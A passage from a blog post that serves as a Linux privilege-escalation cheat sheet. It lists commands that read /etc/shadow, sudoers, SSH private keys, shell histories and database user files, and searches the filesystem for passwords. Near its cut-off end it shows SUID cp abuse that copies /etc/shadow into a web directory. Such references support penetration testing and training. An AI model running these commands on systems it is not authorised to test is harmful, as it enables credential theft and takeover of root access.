x-small;">https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md</span></a></div></div></div>TheShahzadahttp://www.blogger.com/profile/01405567763403009941noreply@blogger.com0tag:blogger.com,1999:blog-1395592345970778383.post-86025595166610299162021-01-25T16:26:00.007+06:002021-02-27T11:17:37.609+06:00Linux Privilege Escalation<p style="text-align: center;"><span style="font-family: courier; font-size: large;"><b><br /></b></span></p><p style="text-align: center;"><span style="font-family: courier; font-size: large;"><b>Linux Enumeration for Escalation Root Access</b></span></p><p><span style="font-family: courier; font-size: large;"></span></p><div style="text-align: center;"><span style="font-family: courier; font-size: large;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfTXjx8SuOq-vHWXtwQ9YijTqn0_SUYlWYJDs1zN0334s256mX82VrDF0OhjrWN6Y65FG_GZOTP8rkgI_5xUxyJ_YcA2v7J4izNCnGz3JgLTAOIrrHwcvWVWcue7kabz5cUWpa9ji8IVs/s1920/Linux+Privilege+Escalation.png"><img border="0" data-original-height="1200" data-original-width="1920" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfTXjx8SuOq-vHWXtwQ9YijTqn0_SUYlWYJDs1zN0334s256mX82VrDF0OhjrWN6Y65FG_GZOTP8rkgI_5xUxyJ_YcA2v7J4izNCnGz3JgLTAOIrrHwcvWVWcue7kabz5cUWpa9ji8IVs/s16000/Linux+Privilege+Escalation.png" /></a></span></div><p></p><p><span style="font-family: courier; font-size: medium;"> <b>=== Operating System ===</b></span></p><p><span style="font-family: courier; font-size: medium;"><b>## What's the distribution type? What version?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/issue</span></p><p><span style="font-family: courier; font-size: large;">cat /etc/*-release</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/lsb-release</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/redhat-release</span></p><p><span style="font-family: courier; font-size: medium;"> </span></p><p><span style="font-family: courier; font-size: medium;">uname -n // System hostname</span></p><p><span style="font-family: courier; font-size: medium;">hostname // As above</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## What's the Kernel version? Is it 64-bit?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /proc/version </span></p><p><span style="font-family: courier; font-size: medium;">uname -a</span></p><p><span style="font-family: courier; font-size: medium;">uname -r // Kernel release</span></p><p><span style="font-family: courier; font-size: medium;">uname -mrs </span></p><p><span style="font-family: courier; font-size: medium;">rpm -q kernel </span></p><p><span style="font-family: courier; font-size: medium;">dmesg | grep Linux</span></p><p><span style="font-family: courier; font-size: medium;">ls /boot | grep vmlinuz-</span></p><p><span style="font-family: courier; font-size: medium;">cat /proc/cpuinfo // CPU information</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== What can be learnt from the environmental variables? ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/profile</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/bashrc</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.bash_profile</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.bashrc</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.bash_logout</span></p><p><span style="font-family: courier; font-size: medium;">env</span></p><p><span style="font-family: courier; font-size: medium;">set</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b> === Is there a printer? ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">lpstat -a</span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Users & Groups: === </b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/passwd </span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/group // List all groups on the system</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/shadow // Show user hashes β Privileged command</span></p><p><span style="font-family: courier; font-size: medium;">grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' List all super user accounts</span></p><p><span style="font-family: courier; font-size: medium;">finger // Users currently logged in</span></p><p><span style="font-family: courier; font-size: medium;">pinky // As above</span></p><p><span style="font-family: courier; font-size: medium;">users // As above</span></p><p><span style="font-family: courier; font-size: medium;">who -a // As above</span></p><p><span style="font-family: courier; font-size: medium;">w // Who is currently logged in and what theyβre doing</span></p><p><span style="font-family: courier; font-size: medium;">last // Listing of last logged on users</span></p><p><span style="font-family: courier; font-size: medium;">lastlog // Information on when all users last logged in</span></p><p><span style="font-family: courier; font-size: medium;">lastlog --user root // Information on when the specified user last logged in</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== User & Privilege Information: ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">whoami </span></p><p><span style="font-family: courier; font-size: medium;">id </span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/sudoers // Whoβs allowed to do what as root β Privileged command</span></p><p><span style="font-family: courier; font-size: medium;">sudo -l // Can the current user perform anything as root</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/passwd | cut -d: # List of users</span></p><p><span style="font-family: courier; font-size: medium;">grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}' # List of super users</span></p><p><span style="font-family: courier; font-size: medium;">awk -F: '($3 == "0") {print}' /etc/passwd # List of super users</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/sudoers</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;">## What has the user is doing? Is there any password in plain text? What have they been editing?</span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat ~/.bash_history</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.nano_history</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.atftp_history</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.mysql_history </span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.php_history</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>What user information can be found? </b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat ~/.bashrc</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.profile</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/mail/root</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/spool/mail/root</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ps aux | grep root</span></p><p><span style="font-family: courier; font-size: medium;">ps -ef | grep root</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>What applications are installed? What version are they? Are they currently running?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -alh /usr/bin/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /sbin/</span></p><p><span style="font-family: courier; font-size: medium;">dpkg -l</span></p><p><span style="font-family: courier; font-size: medium;">rpm -qa</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/cache/apt/archivesO</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/cache/yum/ </span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Environmental Information: ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">env // Display environmental variables</span></p><p><span style="font-family: courier; font-size: medium;">set // As above</span></p><p><span style="font-family: courier; font-size: medium;">echo $PATH // Path information</span></p><p><span style="font-family: courier; font-size: medium;">history // Displays command history of current user</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/profile // Display default system variables</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Which service(s) are been running by root? Of these services, which are vulnerable - it's worth a double check!</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ps aux | grep root</span></p><p><span style="font-family: courier; font-size: medium;">ps -ef | grep root</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== What applications are installed? What version are they? Are they currently running? ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -alh /usr/bin/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /sbin/</span></p><p><span style="font-family: courier; font-size: medium;">dpkg -l</span></p><p><span style="font-family: courier; font-size: medium;">rpm -qa</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/cache/apt/archivesO</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/cache/yum/ </span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"> <b>=== Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached? ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/syslog.conf </span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/chttp.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/lighttpd.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/cups/cupsd.conf </span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/inetd.conf </span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/apache2/apache2.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/my.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/httpd/conf/httpd.conf</span></p><p><span style="font-family: courier; font-size: medium;">cat /opt/lampp/etc/httpd.conf</span></p><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/ | awk '$1 ~ /^.*r.*/ </span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">ps aux | grep root // View services running as root</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/inetd.conf // List services managed by inetd</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/xinetd.conf // As above for xinetd</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Installed programs === </b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">dpkg -l Installed packages (Debian)</span></p><p><span style="font-family: courier; font-size: medium;">rpm -qa Installed packages (Red Hat)</span></p><p><span style="font-family: courier; font-size: medium;">sudo -V Sudo version β does an exploit exist?</span></p><p><span style="font-family: courier; font-size: medium;">httpd -v Apache version</span></p><p><span style="font-family: courier; font-size: medium;">apache2 -v As above</span></p><p><span style="font-family: courier; font-size: medium;">apache2ctl (or apachectl) -M List loaded Apache modules</span></p><p><span style="font-family: courier; font-size: medium;">mysql --version Installed MYSQL version details</span></p><p><span style="font-family: courier; font-size: medium;">perl -v Installed Perl version details</span></p><p><span style="font-family: courier; font-size: medium;">java -version Installed Java version details</span></p><p><span style="font-family: courier; font-size: medium;">python --version Installed Python version details</span></p><p><span style="font-family: courier; font-size: medium;">ruby -v Installed Ruby version details</span></p><p><span style="font-family: courier; font-size: medium;">find / -name %program_name% 2>/dev/null (i.e. nc, netcat, wget, nmap etc) Locate βusefulβ programs (netcat, wget etc)</span></p><p><span style="font-family: courier; font-size: medium;">which %program_name% (i.e. nc, netcat, wget, nmap etc) As above</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== SSH info ? ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><b>## Can private-key information be found? </b></span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/authorized_keys</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/identity.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/identity</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/id_rsa.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/id_rsa</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/id_dsa.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.ssh/id_dsa</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_config</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/sshd_config</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_dsa_key.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_dsa_key</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_rsa_key.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_rsa_key</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_key.pub</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/ssh/ssh_host_key</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Jobs/Tasks: ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">crontab -l -u %username% // Display scheduled jobs for the specified user β Privileged command</span></p><p><span style="font-family: courier; font-size: medium;">ls -la /etc/cron* // Scheduled jobs overview (hourly, daily, monthly etc)</span></p><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/cron* | awk '$1 ~ /w.$/' 2>/dev/null // What can βothersβ write in /etc/cron* directories</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/spool/cron</span></p><p><span style="font-family: courier; font-size: medium;">ls -al /etc/ | grep cron</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/cron*</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/at.allow</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/at.deny</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/cron.allow</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/cron.deny</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/crontab</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /etc/cron.daily</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /etc/cron.weekly</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /etc/cron.monthly</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/anacrontab</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/spool/cron/crontabs/root</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Interesting Files: ===</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find /home βname .rhosts -print 2>/dev/null // Find rhost config files</span></p><p><span style="font-family: courier; font-size: medium;">ls -ahlR /root/ // See if you can access other user directories to find interesting files β Privileged command</span></p><p><span style="font-family: courier; font-size: medium;">cat ~/.bash_history // Show the current usersβ command history</span></p><p><span style="font-family: courier; font-size: medium;">ls -la ~/._history // Show the current usersβ various history files</span></p><p><span style="font-family: courier; font-size: medium;">ls -la ~/.ssh/ Check // for interesting ssh files in the current usersβ directory</span></p><p><span style="font-family: courier; font-size: medium;">ls -la /usr/sbin/in.* // Check Configuration of inetd services</span></p><p><span style="font-family: courier; font-size: medium;">find /var/log -type f -exec ls -la {} ; 2>/dev/null List files in specified directory (/var/log)</span></p><p><span style="font-family: courier; font-size: medium;">find /var/log -name *.log -type f -exec ls -la {} ; 2>/dev/null List .log files in specified directory (/var/log)</span></p><p><span style="font-family: courier; font-size: medium;">find /etc/ -maxdepth 1 -name .conf -type f -exec ls -la {} ; 2>/dev/null List .conf files in /etc (recursive 1 level)</span></p><p><span style="font-family: courier; font-size: medium;">ls -la /etc/.conf As above</span></p><p><span style="font-family: courier; font-size: medium;">lsof -i -n ## List open files (output will depend on account privileges)</span></p><p><span style="font-family: courier; font-size: medium;">lsof -u root ## lists all open files and processes by user root</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Which configuration files can be written in /etc/? Able to reconfigure a service?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null # Anyone</span></p><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null # Owner</span></p><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null # Group</span></p><p><span style="font-family: courier; font-size: medium;">ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null # Other</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find /etc/ -readable -type f 2>/dev/null # Anyone</span></p><p><span style="font-family: courier; font-size: medium;">find /etc/ -readable -type f -maxdepth 1 2>/dev/null # Anyone </span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Where can written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -writable -type d 2>/dev/null # world-writable folders</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -222 -type d 2>/dev/null # world-writable folders</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -o+w -type d 2>/dev/null # world-writable folders</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -o+x -type d 2>/dev/null # world-executable folders</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writable & executable folders</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Any "problem" files? Word-writable, "nobody" files</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writable files</span></p><p><span style="font-family: courier; font-size: medium;">find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## What sensitive files can be found? </b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">cat /etc/passwd</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/group</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/shadow</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/mail/</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Anything "interesting" in the home directorie(s)? If it's possible to access</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -ahlR /root/</span></p><p><span style="font-family: courier; font-size: medium;">ls -ahlR /home/</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## What can be found in /var/ ?</b> </span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -alh /var/log</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/mail</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/spool</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/spool/lpd </span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/lib/pgsql</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/lib/mysql</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/lib/dhcp3/dhclient.leases</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Any settings/files (hidden) on website? Any settings file with database information?</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">ls -alhR /var/www/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alhR /srv/www/htdocs/ </span></p><p><span style="font-family: courier; font-size: medium;">ls -alhR /usr/local/www/apache22/data/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alhR /opt/lampp/htdocs/ </span></p><p><span style="font-family: courier; font-size: medium;">ls -alhR /var/www/html/</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Is there anything in the log file(s) (Could help with "Local File Includes"!)</b></span></p><pre><code><p><span style="font-family: courier; font-size: large;">cat /etc/httpd/logs/access_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/httpd/logs/access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/httpd/logs/error_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /etc/httpd/logs/error.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache2/access_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache2/access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache2/error_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache2/error.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache/access_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/apache/access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/auth.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/chttp.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/cups/error_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/dpkg.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/faillog</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/httpd/access_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/httpd/access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/httpd/error_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/httpd/error.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/lastlog</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/lighttpd/access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/lighttpd/error.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/lighttpd/lighttpd.access.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/lighttpd/lighttpd.error.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/messages</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/secure</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/syslog</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/wtmp</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/xferlog</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/log/yum.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/run/utmp</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/webmin/miniserv.log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/www/logs/access_log</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/www/logs/access.log</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/lib/dhcp3/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/log/postgresql/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/log/proftpd/</span></p><p><span style="font-family: courier; font-size: medium;">ls -alh /var/log/samba/</span></p><p><span style="font-family: courier; font-size: medium;"># auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Search for specific strings inside a file</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">file ./somefile ## file info</span></p><p><span style="font-family: courier; font-size: medium;">strings ./*.txt | grep password</span></p><p><span style="font-family: courier; font-size: medium;">find / -name β*.logβ |xargs grep -i pass</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">grep -l -i pass /var/log/*.log 2>/dev/null</span></p><p><span style="font-family: courier; font-size: medium;">find / -maxdepth 10 -name *.conf -type f | grep -Hn pass; 2>/dev/null // searches for the string 'password' and output the line number</span></p><p><span style="font-family: courier; font-size: medium;">find / -maxdepth 10 -name *etc* -type f | grep -Hn pass; 2>/dev/null //as above, but in *etc*</span></p><p><span style="font-family: courier; font-size: medium;">grep -l -i pass /var/log/*.log 2>/dev/null Check log files for keywords (βpassβ in this example) and show positive matches</span></p><p><span style="font-family: courier; font-size: medium;">find / -maxdepth 4 -name *.conf -type f -exec grep -Hn password {} ; 2>/dev/null Find .conf files (recursive 4 levels) and output line number where the word password is located</span></p><p><span style="font-family: courier; font-size: medium;">grep -i user [filename]</span></p><p><span style="font-family: courier; font-size: medium;">grep -i pass [filename]</span></p><p><span style="font-family: courier; font-size: medium;">grep -C 5 "password" [filename]</span></p><p><span style="font-family: courier; font-size: medium;">find . -name "*.php" -print0 | xargs -0 grep -i -n "var $password" # Joomla </span></p><p><span style="font-family: courier; font-size: medium;">hexeditor ./file</span></p><p><span style="font-family: courier; font-size: medium;">objdump -D -M intel ./file</span></p><p><span style="font-family: courier; font-size: medium;">objdump -D -M x86-64 ./file >> dump64.file</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">cat /var/apache2/config.inc</span></p><p><span style="font-family: courier; font-size: medium;">cat /var/lib/mysql/mysql/user.MYD </span></p><p><span style="font-family: courier; font-size: medium;">cat /root/anaconda-ks.cfg</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find / -name "network-secret.txt"</span></p><p><span style="font-family: courier; font-size: medium;">locate "network-secret.txt"</span></p><p><span style="font-family: courier; font-size: medium;"> </span></p></code></pre><p><span style="font-family: courier; font-size: medium;"> <b>=== Permissions ===</b></span></p><p><span style="font-family: courier; font-size: medium;"><b>## What "Advanced Linux File Permissions" are used? Sticky bits, SUID & GUID</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -perm -u=s -type f 2>/dev/null #Find FILES that have the sticky bit set. </span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -1000 -type d 2>/dev/null # Find DIRECTORIES w/ Sticky bit - Only the owner of the directory or the owner of a file can delete or rename here</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -g=s -type f 2>/dev/null # SGID (chmod 2000) - run as the group, not the user who started it.</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -u=s -type f 2>/dev/null # SUID (chmod 4000) - run as the owner, not the user who started it.</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -g=s -o -perm -u=s -type f 2>/dev/null # SGID or SUID</span></p><p><span style="font-family: courier; font-size: medium;">for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"># find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -g=s -o -perm -4000 ! -type l -maxdepth 3 -exec ls -ld {} \; 2>/dev/null </span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p></code></pre><p><span style="font-family: courier; font-size: medium;"><b>## Where can be written to and executed from? A few 'common' places: /tmp, /var/tmp, /dev/shm</b></span></p><pre><code><p><span style="font-family: courier; font-size: medium;">find / -writable -type d 2>/dev/null # world-writable folders</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -222 -type d 2>/dev/null # world-writable folders</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -o+w -type d 2>/dev/null # world-writable folders</span></p><p><span style="font-family: courier; font-size: medium;">find / -perm -o+x -type d 2>/dev/null # world-executable folders</span></p><p><span style="font-family: courier; font-size: medium;">find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null # world-writable & executable folders</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">Any "problem" files? Word-writable, "nobody" files</span></p><p><span style="font-family: courier; font-size: medium;">find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print # world-writable files</span></p><p><span style="font-family: courier; font-size: medium;">find /dir -xdev \( -nouser -o -nogroup \) -print # Noowner files</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">Example:</span></p><p><span style="font-family: courier; font-size: medium;">## We found cp (copy) in the above list and now we are abusing it:</span></p><p><span style="font-family: courier; font-size: medium;">cp -f --no-preserve=all /etc/shadow /var/www/html/joomla/shadow.txt</span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;"><br /></span></p><p><span style="font-family: courier; font-size: medium;">Few things to keep in mind:</span></p><p><span style="font-family: courier; font-size: medium;">## (1) at the destination, the file owner will be root but the group will be that of the current user and 